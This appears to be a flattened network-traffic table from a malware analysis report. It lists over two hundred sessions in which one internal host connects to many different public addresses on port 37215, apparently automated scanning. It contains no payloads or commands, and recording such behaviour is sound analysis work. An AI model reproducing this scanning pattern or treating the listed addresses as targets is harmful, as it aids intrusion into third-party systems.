                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8568192.168.2.1535790138.243.84.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8569192.168.2.1551582121.89.192.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8570192.168.2.154781241.210.126.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8571192.168.2.153490294.61.113.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8572192.168.2.154077445.182.31.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8573192.168.2.1534590197.204.64.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8574192.168.2.1556606122.114.102.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8575192.168.2.1533328186.231.110.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8576192.168.2.1540948190.154.211.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8577192.168.2.1560916121.117.211.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8578192.168.2.1554528156.7.106.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8579192.168.2.1558246121.250.58.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8580192.168.2.155923841.166.129.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8581192.168.2.1542494102.160.184.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8582192.168.2.1551150138.162.175.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8583192.168.2.153581631.16.156.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8584192.168.2.155073232.153.44.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8585192.168.2.1537696149.143.105.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8586192.168.2.1546482197.88.65.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8587192.168.2.1538830138.18.72.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8588192.168.2.1541012222.184.251.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8589192.168.2.154371237.0.218.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8590192.168.2.155359494.65.142.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8591192.168.2.1556676181.248.169.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8592192.168.2.1534122156.238.43.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8593192.168.2.1553350156.36.255.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8594192.168.2.1556176131.165.242.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8595192.168.2.1560544222.234.39.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8596192.168.2.1544102157.155.7.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8597192.168.2.1541880147.142.37.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8598192.168.2.155981294.91.115.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8599192.168.2.1553376156.133.111.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8600192.168.2.1543018222.246.45.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8601192.168.2.1543186181.145.65.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8602192.168.2.154798441.228.38.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8603192.168.2.1551206190.54.194.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8604192.168.2.1533244156.54.104.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8605192.168.2.1553294197.52.5.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8606192.168.2.1553358222.117.186.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8607192.168.2.1535920197.214.33.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8608192.168.2.1541592138.28.140.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8609192.168.2.1541900138.238.153.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8610192.168.2.1553912138.153.24.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8611192.168.2.155847241.54.151.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8612192.168.2.1555124181.54.17.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8613192.168.2.1534274156.244.11.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8614192.168.2.155336631.117.175.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8615192.168.2.1554044222.73.82.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8616192.168.2.155498241.25.87.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8617192.168.2.1542714193.91.178.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8618192.168.2.1549098190.32.227.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8619192.168.2.154540037.206.1.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8620192.168.2.1533704122.197.180.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8621192.168.2.1554300102.11.121.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8622192.168.2.1557888181.213.238.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8623192.168.2.1551890121.47.57.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8624192.168.2.1552846102.206.153.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8625192.168.2.1547040156.103.120.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8626192.168.2.1533736198.230.203.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8627192.168.2.1536020134.163.157.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8628192.168.2.1539440186.182.250.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8629192.168.2.155184837.148.132.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8630192.168.2.155418694.136.75.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8631192.168.2.1541166157.182.119.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8632192.168.2.153936631.192.204.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8633192.168.2.1556132121.83.143.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8634192.168.2.155309641.248.72.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8635192.168.2.1533052181.73.171.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8636192.168.2.1554500138.165.132.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8637192.168.2.1550162157.78.81.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8638192.168.2.153712637.201.162.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8639192.168.2.154821493.46.12.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8640192.168.2.1534046102.19.130.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8641192.168.2.1554962186.101.201.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8642192.168.2.155568237.74.35.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8643192.168.2.1541230157.195.94.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8644192.168.2.153938037.105.153.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8645192.168.2.1533598190.249.69.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8646192.168.2.1560960190.86.22.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8647192.168.2.153450637.163.96.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8648192.168.2.1536078190.199.250.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8649192.168.2.1534542190.250.127.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8650192.168.2.154427441.172.205.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8651192.168.2.1555676157.135.253.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8652192.168.2.1549404197.230.79.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8653192.168.2.1556666121.71.87.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8654192.168.2.1552032186.173.133.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8655192.168.2.1533606102.180.146.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8656192.168.2.155960694.195.48.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8657192.168.2.1548086121.62.35.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8658192.168.2.1540740186.98.99.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8659192.168.2.1557210197.12.225.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8660192.168.2.153699231.174.2.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8661192.168.2.1541558157.118.193.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8662192.168.2.1535504138.215.50.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8663192.168.2.1542142108.143.226.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8664192.168.2.1537104186.81.123.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8665192.168.2.1544234138.212.24.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8666192.168.2.1554036197.144.39.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8667192.168.2.1554562222.62.155.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8668192.168.2.155395459.184.98.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8669192.168.2.1539010156.219.112.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8670192.168.2.1541318222.134.32.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8671192.168.2.1544470122.198.228.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8672192.168.2.1549614157.241.220.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8673192.168.2.1557018222.216.230.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8674192.168.2.1534062122.61.82.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8675192.168.2.154500837.61.136.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8676192.168.2.1553766122.217.252.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8677192.168.2.155868445.24.231.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8678192.168.2.155338094.11.234.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8679192.168.2.1556386121.97.176.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8680192.168.2.1546334222.189.37.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8681192.168.2.155861245.28.180.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8682192.168.2.155680236.174.18.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8683192.168.2.1556154197.228.105.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8684192.168.2.1547822197.189.242.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8685192.168.2.155752631.113.151.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8686192.168.2.154760237.207.202.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8687192.168.2.1558534102.24.237.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8688192.168.2.1546002121.56.126.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8689192.168.2.1548242186.75.27.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8690192.168.2.1549464197.150.138.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8691192.168.2.1547302122.7.190.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8692192.168.2.1549194138.164.197.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8693192.168.2.1540818190.71.225.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8694192.168.2.1534890197.174.102.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8695192.168.2.154179645.95.74.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8696192.168.2.156022237.143.95.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8697192.168.2.155890837.77.46.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8698192.168.2.153904231.55.57.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8699192.168.2.154885045.203.12.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8700192.168.2.1551486121.81.233.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8701192.168.2.155937817.21.81.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8702192.168.2.155096641.131.84.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8703192.168.2.154167037.81.57.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8704192.168.2.1548518138.65.183.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8705192.168.2.1533040138.242.18.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8706192.168.2.1559102181.160.133.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8707192.168.2.1555378222.59.184.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8708192.168.2.155584494.64.81.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8709192.168.2.1540272121.178.70.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8710192.168.2.1550610157.176.196.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8711192.168.2.1548520121.231.238.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8712192.168.2.1542270222.117.155.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8713192.168.2.1544966138.91.250.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8714192.168.2.1557778138.154.185.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8715192.168.2.153408831.38.29.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8716192.168.2.154340831.67.14.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8717192.168.2.1546134121.5.183.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8718192.168.2.1541692138.206.14.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8719192.168.2.1552726197.253.13.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8720192.168.2.154684841.111.71.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8721192.168.2.155876445.75.48.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8722192.168.2.1532952156.202.179.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8723192.168.2.1542564208.183.162.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8724192.168.2.1534768222.94.151.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8725192.168.2.1543716186.86.59.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8726192.168.2.1559304156.198.56.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8727192.168.2.1552624138.209.238.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8728192.168.2.155196641.222.152.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8729192.168.2.1547272121.42.201.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8730192.168.2.1551964190.146.192.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8731192.168.2.1541730157.252.162.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8732192.168.2.1556148197.209.168.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8733192.168.2.153885694.240.197.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8734192.168.2.1541906121.238.118.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8735192.168.2.1539634190.115.243.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8736192.168.2.1537050122.11.165.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8737192.168.2.1554900157.87.33.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8738192.168.2.1560864121.129.192.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8739192.168.2.1538568121.245.170.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8740192.168.2.1550226197.91.146.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8741192.168.2.1546122186.127.233.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8742192.168.2.1533914122.136.95.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8743192.168.2.1546152114.170.50.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8744192.168.2.1544746197.207.52.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8745192.168.2.1539832181.236.242.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8746192.168.2.1560862197.4.136.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8747192.168.2.1542610157.134.66.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8748192.168.2.1541916138.175.73.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8749192.168.2.1558822121.75.67.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8750192.168.2.1533318122.42.186.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8751192.168.2.1553016157.201.166.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8752192.168.2.1534770156.175.27.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8753192.168.2.1532960197.133.71.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8754192.168.2.1554246121.2.156.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8755192.168.2.1539292222.138.158.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8756192.168.2.153497631.204.79.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8757192.168.2.1537856197.235.150.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8758192.168.2.1535016181.76.216.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8759192.168.2.1542234186.228.187.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8760192.168.2.1554690181.82.174.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8761192.168.2.1555376138.116.141.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8762192.168.2.1545186102.53.193.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8763192.168.2.1551510156.167.83.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8764192.168.2.1558694156.177.100.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8765192.168.2.153560031.193.253.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8766192.168.2.153961894.170.61.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8767192.168.2.1550540157.245.185.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8768192.168.2.1540040168.67.128.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8769192.168.2.1548264156.214.161.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8770192.168.2.1545484186.118.70.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8771192.168.2.1534866138.28.113.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8772192.168.2.1549536138.68.153.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8773192.168.2.153728631.50.174.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8774192.168.2.153482631.149.181.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8775192.168.2.1555768166.26.242.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8776192.168.2.155339270.217.83.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8777192.168.2.1559174186.213.13.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8778192.168.2.1539200186.51.165.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8779192.168.2.1544780138.142.3.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8780192.168.2.155563094.125.128.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8781192.168.2.155469645.236.154.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8782192.168.2.1550154197.43.130.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8783192.168.2.1536520197.251.173.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8784192.168.2.1557410157.219.178.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8785192.168.2.1559140181.58.195.10037215
                                              TimestampBytes transferredDirectionData


